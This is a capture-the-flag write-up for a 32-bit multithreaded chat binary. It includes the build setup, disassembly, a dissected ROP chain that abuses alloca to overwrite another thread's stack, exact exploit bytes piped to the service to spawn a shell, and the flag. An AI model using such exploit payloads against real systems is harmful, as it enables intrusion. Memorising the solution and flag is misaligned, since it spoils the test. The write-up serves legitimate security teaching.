Chat ==== # Author n0p # Challenge Text To coordinate our efforts for a better future we started to build a chat program. While it doesn't have much functionality, yet, maybe you could have a look at it already to see if you can find any serious vulnerabilities. You know, better save than sorry!

nc 1337 # Challenge Idea [ROP/Etc. in the stack of another thread.]( # Setup Compiling the Sources: ``` clang -no-pie -static chat.c -lpthread -ochat -Wl,-z,now -Wl,-z,relro strip -g chat ``` Docker from: ``` FROM i386/alpine ``` Docker entrypoint: ``` ENTRYPOINT ["/usr/bin/socat", "-t5", "-T60", "tcp-listen:1337,max-children=50,reuseaddr,fork", "exec:./chat,pty,raw,stderr,echo=0"] ``` # Solution ``` $ checksec chat [*] '/misc/projects/Chat/chat' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) ``` ``` $ ./chat Command Channel: > /h Command Commands: /nc - New Chat Channel - Create and join a new Chat Channel. /jc x - Join Chat Channel - Join the Chat Channel number x. /lc - List Chat Channels - Lists the Chat Channels. /q - Quit - Quit this awesome chat program. /h - Help - Print this help message. > /nc Chat Channel 1: > /h Chat Commands: /e - Echo - The first line following this command specifies the number of characters to echo. /pc - Pause Chat Channel - Return to Command Channel. The Chat Channel stays open. /qc - Quit Chat Channel - Return to Command Channel. The Chat Channel is terminated. /h - Help - Print this help message. That's all for now :/ > ``` The number of characters to echo are read with `fgets` and converted to an integer with `atoi`. Afterwards the memory for the characters is allocated with `alloca`. One cannot wrap esp around with `alloca` by providing a negative number of characters to echo, as the actual characters are also read with `fgets`. And `fgets` doesn't accept a negative size. Idea: * There is enough space in the command variable to place the string '/bin/sh', argv, and envp in the bss section. * Create two channels and allocate enough memory with `alloca` via the echo command in the first channel to write to the stack of the second channel. * ROP to execve. ``` # create channel 1 /nc\n # pause channel 1 and return to command channel /pc\n # create channel 2 /nc\n # pause channel 2 and return to command channel /pc\n # join channel 1 again /jc 1\n # echo a message /e\n # length of the message is 250000 -> we write to the stack of channel 2 # + 2 NULL bytes (two because I like 0xC more than 0xB) + '/bin/sh' + NULL byte + addr of '/bin/sh' string in command + NULL dword 250000\0\0/bin/sh\x00\x8c\x73\x0f\x08\x00\x00\x00\x00\n # send rop code \x00\x00\x00\x00\x40\x74\x0f\x08\x34\x74\x0f\x08\x1e\x90\x04\x08\x2c\x74\x0f\x08\xf6\x1c\x05\x08\x0b\x00\x00\x00\xd0\xd3\x07\x08\n # terminate channel 1 /qc\n # join channel 2 /jc 2\n ``` The function who's return address gets overwritten is `__kernel_vsyscall`: ``` → 0xf7ffdb20 <__kernel_vsyscall+0> push ecx 0xf7ffdb21 <__kernel_vsyscall+1> push edx 0xf7ffdb22 <__kernel_vsyscall+2> push ebp 0xf7ffdb23 <__kernel_vsyscall+3> mov ebp, esp 0xf7ffdb25 <__kernel_vsyscall+5> sysenter 0xf7ffdb27 <__kernel_vsyscall+7> int 0x80 ``` This function is called at address 0x08079004 in poll: ``` .text:08078FE8 loc_8078FE8: ; CODE XREF: poll+19↑j .text:08078FE8 mov [esp+1Ch+var_10], edx .text:08078FEC mov [esp+1Ch+var_14], ecx .text:08078FF0 call __libc_enable_asynccancel .text:08078FF5 mov ecx, [esp+1Ch+var_14] .text:08078FF9 mov edx, [esp+1Ch+var_10] .text:08078FFD mov esi, eax .text:08078FFF mov eax, 0A8h .text:08079004 call large dword ptr gs:10h .text:0807900B cmp eax, 0FFFFF000h .text:08079010 ja short loc_807903A ``` As one can see, the registers ecx and edx are pushed at the beginning of `__kernel_vsyscall`. Therefore, we can set ecx and edx conveniently due to `__kernel_vsyscall`'s pops of these registers before its return. ROP dissected: ``` # ebp \x00\x00\x00\x00 # edx -> envp points to NULL dword in command buffer -> envp = [NULL] \x98\x73\x0f\x08 # ecx -> argv points in command buffer -> argv = ["/bin/sh", NULL] \x94\x73\x0f\x08 # ret -> 0x0804901e : pop ebx ; ret \x1e\x90\x04\x08 # ebx -> addr of command with '/bin/sh' \x8c\x73\x0f\x08 # ret -> 0x08051cf6 : pop eax ; ret \xf6\x1c\x05\x08 # eax -> shell code number \x0b\x00\x00\x00 # ret -> 0x0807D3D0 : int 0x80 ; retn (_dl_sysinfo_int80) \xd0\xd3\x07\x08 ``` This results in these commands: ``` $ (python2 -c "print '/nc\n/pc\n/nc\n/pc\n/jc 1\n/e\n250000\0\0/bin/sh\x00\x8c\x73\x0f\x08\x00\x00\x00\x00\n\x00\x00\x00\x00\x98\x73\x0f\x08\x94\x73\x0f\x08\x1e\x90\x04\x08\x8c\x73\x0f\x08\xf6\x1c\x05\x08\x0b\x00\x00\x00\xd0\xd3\x07\x08\n/qc\n/jc 2\n'"; cat - ) | ./chat ``` ``` $ (python2 -c "print '/nc\n/pc\n/nc\n/pc\n/jc 1\n/e\n250000\0\0/bin/sh\x00\x8c\x73\x0f\x08\x00\x00\x00\x00\n\x00\x00\x00\x00\x98\x73\x0f\x08\x94\x73\x0f\x08\x1e\x90\x04\x08\x8c\x73\x0f\x08\xf6\x1c\x05\x08\x0b\x00\x00\x00\xd0\xd3\x07\x08\n/qc\n/jc 2\n'"; cat - ) | nc 1337 ``` Apparently, the remote solution required `execve('/bin/sh', ["/bin/sh", NULL], [NULL])` and didn't accept `execve('/bin/sh', [NULL], [NULL])`. However, this text book solution had the first execve to begin with and the requirement hasn't been noticed in time. # Difficulty Easy # Flag flag{thread_chat_with_alloca}